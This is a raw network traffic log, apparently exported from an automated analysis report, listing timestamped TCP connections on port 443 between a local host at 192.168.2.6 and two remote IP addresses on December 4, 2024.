                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.444194078 CET4434970513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.444468021 CET49702443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.444489002 CET4434970213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.445025921 CET49702443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.445035934 CET4434970213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.778906107 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.778939009 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.779067039 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.779092073 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.779166937 CET49703443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.779198885 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.779241085 CET49704443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.779242039 CET49703443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.779257059 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.779788017 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.779835939 CET49704443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.782295942 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.782341003 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.782386065 CET49703443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.782581091 CET49703443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.782597065 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.782607079 CET49703443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.782612085 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.783952951 CET49704443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.783972025 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.783984900 CET49704443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.783993006 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.786712885 CET49706443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.786741018 CET4434970613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.786813974 CET49706443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.787024975 CET49706443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.787039995 CET4434970613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.787972927 CET49707443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.788011074 CET4434970713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.788069010 CET49707443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.788177013 CET49707443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.788188934 CET4434970713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.834702015 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.834724903 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.834780931 CET49701443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.834809065 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.834856987 CET49701443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.836251020 CET49701443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.836256981 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.836273909 CET49701443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.836410999 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.836441040 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.836500883 CET49701443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.839628935 CET49708443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.839662075 CET4434970813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.839734077 CET49708443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.843383074 CET49708443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.843403101 CET4434970813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.906814098 CET4434970213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.906868935 CET4434970213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.907094955 CET49702443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.907186985 CET49702443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.907195091 CET4434970213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.907206059 CET49702443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.907212019 CET4434970213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.909841061 CET49709443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.909864902 CET4434970913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.909946918 CET49709443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.910044909 CET49709443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.910056114 CET4434970913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.946382046 CET4434970513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.946439981 CET4434970513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.946599960 CET49705443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.946665049 CET49705443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.946681976 CET4434970513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.946691990 CET49705443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.946696997 CET4434970513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.949023962 CET49710443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.949035883 CET4434971013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.949112892 CET49710443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.949255943 CET49710443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.949270010 CET4434971013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.483499050 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.483537912 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.483616114 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.487013102 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.487030983 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.514302969 CET4434970713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.516977072 CET4434970613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.530704021 CET49707443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.530719042 CET4434970713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.531229973 CET49707443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.531235933 CET4434970713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.531502008 CET49706443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.531514883 CET4434970613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.531929970 CET49706443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.531934977 CET4434970613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.703658104 CET4434970813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.720397949 CET49708443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.720419884 CET4434970813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.721235991 CET49708443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.721240997 CET4434970813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.750034094 CET4434971013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.750669956 CET49710443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.750695944 CET4434971013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.751044035 CET49710443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.751051903 CET4434971013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.779267073 CET4434970913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.788252115 CET49709443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.788275957 CET4434970913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.788727999 CET49709443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.788733959 CET4434970913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.958569050 CET4434970713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.958647013 CET4434970713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.958726883 CET49707443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.959112883 CET4434970613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.959187984 CET4434970613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.959233046 CET49706443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.972553968 CET49707443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.972559929 CET4434970713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.972569942 CET49707443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.972575903 CET4434970713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.973923922 CET49706443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.973933935 CET4434970613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.973946095 CET49706443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:01.973951101 CET4434970613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.053874016 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.053924084 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.054003954 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.055200100 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.055216074 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.055278063 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.056582928 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.056596994 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.056684971 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.056696892 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.164586067 CET4434970813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.164653063 CET4434970813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.164756060 CET49708443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.213387966 CET4434971013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.213459015 CET4434971013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.213542938 CET49710443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.253626108 CET4434970913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.253671885 CET4434970913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.253797054 CET49709443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.315654039 CET49708443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.315666914 CET4434970813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.315679073 CET49708443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.315684080 CET4434970813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.316906929 CET49709443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.316937923 CET4434970913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.316962004 CET49709443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.316970110 CET4434970913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.317809105 CET49710443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.317814112 CET4434971013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.317827940 CET49710443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.317831039 CET4434971013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.469202042 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.469248056 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.469307899 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.551142931 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.551182032 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.669595957 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.669636965 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.669699907 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.671566010 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.671577930 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.673465014 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.673526049 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.673582077 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.673700094 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:02.673711061 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.313085079 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.313178062 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.315093040 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.315105915 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.315496922 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.361350060 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.912429094 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.913080931 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.913115025 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.913659096 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:03.913665056 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.344003916 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.345000982 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.345017910 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.345916986 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.345923901 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.375507116 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.375585079 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.375653982 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.380677938 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.380697966 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.380713940 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.380719900 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.400254965 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.433351040 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.433382034 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.434017897 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.434021950 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.464390993 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.479381084 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.479422092 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.479489088 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.480170012 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.480204105 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.480915070 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.480921984 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.481203079 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.481223106 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.795558929 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.795634985 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.795716047 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.820626974 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.820653915 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.843564987 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.843624115 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.843694925 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.860272884 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.860292912 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.916171074 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.916243076 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.916310072 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.947316885 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:04.995331049 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.116447926 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.116480112 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.229392052 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.250304937 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.250329018 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.250783920 CET49712443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.250788927 CET4434971213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.398461103 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.398529053 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.398605108 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.460366011 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.460406065 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.462117910 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.462173939 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.462246895 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.462454081 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.462465048 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.550384045 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.550441027 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.550612926 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.551913977 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.551940918 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.551949024 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.551958084 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.551990986 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.552052021 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.552086115 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.552104950 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.552139044 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.573297977 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.573421955 CET443497114.175.87.197192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.573442936 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.573492050 CET49711443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.633975983 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:05.634007931 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:06.337927103 CET4434971913.107.246.63192.168.2.6
